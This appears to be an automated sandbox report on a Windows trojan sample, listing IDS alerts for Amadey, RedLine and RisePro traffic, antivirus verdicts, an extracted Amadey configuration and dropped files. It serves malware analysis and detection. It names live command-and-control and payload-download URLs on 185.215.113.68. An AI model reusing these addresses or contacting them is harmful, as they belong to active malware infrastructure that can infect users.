Timestamp:	192.168.2.6185.215.113.6849898802856147 01/18/24-00:35:02.398575
SID:	2856147
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850413802856147 01/18/24-00:37:00.893075
SID:	2856147
Source Port:	50413
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850486802856147 01/18/24-00:37:43.787396
SID:	2856147
Source Port:	50486
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850492802856147 01/18/24-00:37:47.044020
SID:	2856147
Source Port:	50492
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850257802856147 01/18/24-00:35:48.116070
SID:	2856147
Source Port:	50257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850456802856147 01/18/24-00:37:25.667285
SID:	2856147
Source Port:	50456
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850373802856147 01/18/24-00:36:38.121378
SID:	2856147
Source Port:	50373
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850193802856147 01/18/24-00:35:39.731618
SID:	2856147
Source Port:	50193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850224802856147 01/18/24-00:35:43.056483
SID:	2856147
Source Port:	50224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850478802856147 01/18/24-00:37:38.802843
SID:	2856147
Source Port:	50478
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850046802856147 01/18/24-00:35:19.525193
SID:	2856147
Source Port:	50046
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850337802856147 01/18/24-00:36:17.755793
SID:	2856147
Source Port:	50337
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850152802856147 01/18/24-00:35:34.664920
SID:	2856147
Source Port:	50152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850521802856147 01/18/24-00:38:03.539160
SID:	2856147
Source Port:	50521
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850562802856147 01/18/24-00:38:22.841478
SID:	2856147
Source Port:	50562
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850343802856147 01/18/24-00:36:20.029083
SID:	2856147
Source Port:	50343
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850371802856147 01/18/24-00:36:37.048521
SID:	2856147
Source Port:	50371
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850515802856147 01/18/24-00:37:59.159114
SID:	2856147
Source Port:	50515
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850556802856147 01/18/24-00:38:19.591160
SID:	2856147
Source Port:	50556
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 194.33.191.102 - Destination IP: 192.168.2.6

Timestamp:	194.33.191.102192.168.2.621751498502046056 01/18/24-00:35:04.096151
SID:	2046056
Source Port:	21751
Destination Port:	49850
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849907802856147 01/18/24-00:35:03.265366
SID:	2856147
Source Port:	49907
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850365802856147 01/18/24-00:36:33.771647
SID:	2856147
Source Port:	50365
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850307802856147 01/18/24-00:36:00.600043
SID:	2856147
Source Port:	50307
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.6 - Destination IP: 109.107.182.3

Timestamp:	192.168.2.6109.107.182.349707802019714 01/18/24-00:34:29.454587
SID:	2019714
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849943802856147 01/18/24-00:35:06.856843
SID:	2856147
Source Port:	49943
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850402802856147 01/18/24-00:36:55.396084
SID:	2856147
Source Port:	50402
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850484802856147 01/18/24-00:37:42.689289
SID:	2856147
Source Port:	50484
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849970802856147 01/18/24-00:35:13.042385
SID:	2856147
Source Port:	49970
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850482802856147 01/18/24-00:37:40.998423
SID:	2856147
Source Port:	50482
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850580802856147 01/18/24-00:38:31.480759
SID:	2856147
Source Port:	50580
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850393802856147 01/18/24-00:36:49.013673
SID:	2856147
Source Port:	50393
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850454802856147 01/18/24-00:37:24.566415
SID:	2856147
Source Port:	50454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849958802856147 01/18/24-00:35:10.252531
SID:	2856147
Source Port:	49958
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850127802856147 01/18/24-00:35:26.189285
SID:	2856147
Source Port:	50127
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850510802856147 01/18/24-00:37:56.959139
SID:	2856147
Source Port:	50510
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850568802856147 01/18/24-00:38:26.074815
SID:	2856147
Source Port:	50568
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850314802856147 01/18/24-00:36:05.009812
SID:	2856147
Source Port:	50314
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850488802856147 01/18/24-00:37:44.846931
SID:	2856147
Source Port:	50488
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850323802856147 01/18/24-00:36:11.216817
SID:	2856147
Source Port:	50323
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850409802856147 01/18/24-00:36:58.699443
SID:	2856147
Source Port:	50409
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850421802856147 01/18/24-00:37:05.875423
SID:	2856147
Source Port:	50421
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850145802856147 01/18/24-00:35:32.133688
SID:	2856147
Source Port:	50145
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850234802856147 01/18/24-00:35:44.454551
SID:	2856147
Source Port:	50234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850351802856147 01/18/24-00:36:26.152736
SID:	2856147
Source Port:	50351
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850440802856147 01/18/24-00:37:15.767377
SID:	2856147
Source Port:	50440
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.6 - Destination IP: 193.233.132.62

Timestamp:	192.168.2.6193.233.132.6249699505002049060 01/18/24-00:34:13.667039
SID:	2049060
Source Port:	49699
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849980802856147 01/18/24-00:35:13.995671
SID:	2856147
Source Port:	49980
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850558802856147 01/18/24-00:38:20.686044
SID:	2856147
Source Port:	50558
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850333802856147 01/18/24-00:36:16.030962
SID:	2856147
Source Port:	50333
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850498802856147 01/18/24-00:37:50.365946
SID:	2856147
Source Port:	50498
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850262802856147 01/18/24-00:35:49.776855
SID:	2856147
Source Port:	50262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850304802856147 01/18/24-00:35:59.745624
SID:	2856147
Source Port:	50304
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850517802856147 01/18/24-00:38:01.353089
SID:	2856147
Source Port:	50517
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850275802856147 01/18/24-00:35:52.242493
SID:	2856147
Source Port:	50275
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M7 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849816802856151 01/18/24-00:34:55.341696
SID:	2856151
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850508802856147 01/18/24-00:37:55.870668
SID:	2856147
Source Port:	50508
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850361802856147 01/18/24-00:36:31.604599
SID:	2856147
Source Port:	50361
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850450802856147 01/18/24-00:37:21.316045
SID:	2856147
Source Port:	50450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849968802856147 01/18/24-00:35:12.040778
SID:	2856147
Source Port:	49968
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850349802856147 01/18/24-00:36:24.026828
SID:	2856147
Source Port:	50349
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850536802856147 01/18/24-00:38:11.718768
SID:	2856147
Source Port:	50536
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850355802856147 01/18/24-00:36:28.357913
SID:	2856147
Source Port:	50355
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850009802856147 01/18/24-00:35:16.945363
SID:	2856147
Source Port:	50009
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850444802856147 01/18/24-00:37:18.014223
SID:	2856147
Source Port:	50444
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850542802856147 01/18/24-00:38:15.141310
SID:	2856147
Source Port:	50542
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850266802856147 01/18/24-00:35:51.422656
SID:	2856147
Source Port:	50266
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850281802856147 01/18/24-00:35:53.905038
SID:	2856147
Source Port:	50281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850438802856147 01/18/24-00:37:14.646295
SID:	2856147
Source Port:	50438
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850383802856147 01/18/24-00:36:43.522593
SID:	2856147
Source Port:	50383
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850472802856147 01/18/24-00:37:35.542104
SID:	2856147
Source Port:	50472
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850527802856147 01/18/24-00:38:07.403833
SID:	2856147
Source Port:	50527
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850336802856147 01/18/24-00:36:16.892313
SID:	2856147
Source Port:	50336
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850425802856147 01/18/24-00:37:08.052853
SID:	2856147
Source Port:	50425
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850466802856147 01/18/24-00:37:31.172181
SID:	2856147
Source Port:	50466
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850301802856147 01/18/24-00:35:58.909520
SID:	2856147
Source Port:	50301
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850377802856147 01/18/24-00:36:40.265316
SID:	2856147
Source Port:	50377
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850419802856147 01/18/24-00:37:04.146052
SID:	2856147
Source Port:	50419
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850117802856147 01/18/24-00:35:24.543753
SID:	2856147
Source Port:	50117
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850158802856147 01/18/24-00:35:35.495237
SID:	2856147
Source Port:	50158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850288802856147 01/18/24-00:35:55.542638
SID:	2856147
Source Port:	50288
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.215.113.68/mine/amer.exeshCore	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.php#;	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpA;?d	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.php%;	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpy	Avira URL Cloud: Label: phishing
Source: http://185.215.113.68/theme/index.phpt	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpIU)(A;OICI;FA;;;SY)j-oe	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpr	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpj	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phph	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpc	Avira URL Cloud: Label: malware
Source: http://185.215.113.68/theme/index.phpZ	Avira URL Cloud: Label: malware

Found malware configuration

Source: explorhe.exe.10012.46.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.68/theme/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\autorun[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

ReversingLabs: Detection: 23%

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.61.234:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.196.61.234:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.84:443 -> 192.168.2.6:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.84:443 -> 192.168.2.6:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.6:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.6:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.225.63.72:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50277 version: TLS 1.2

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Control.pdb source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source:	Binary string: Control.pdbhj source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000000.2117805326.0000000000952000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000000.2117805326.0000000000952000.00000002.00000001.01000000.00000006.sdmp
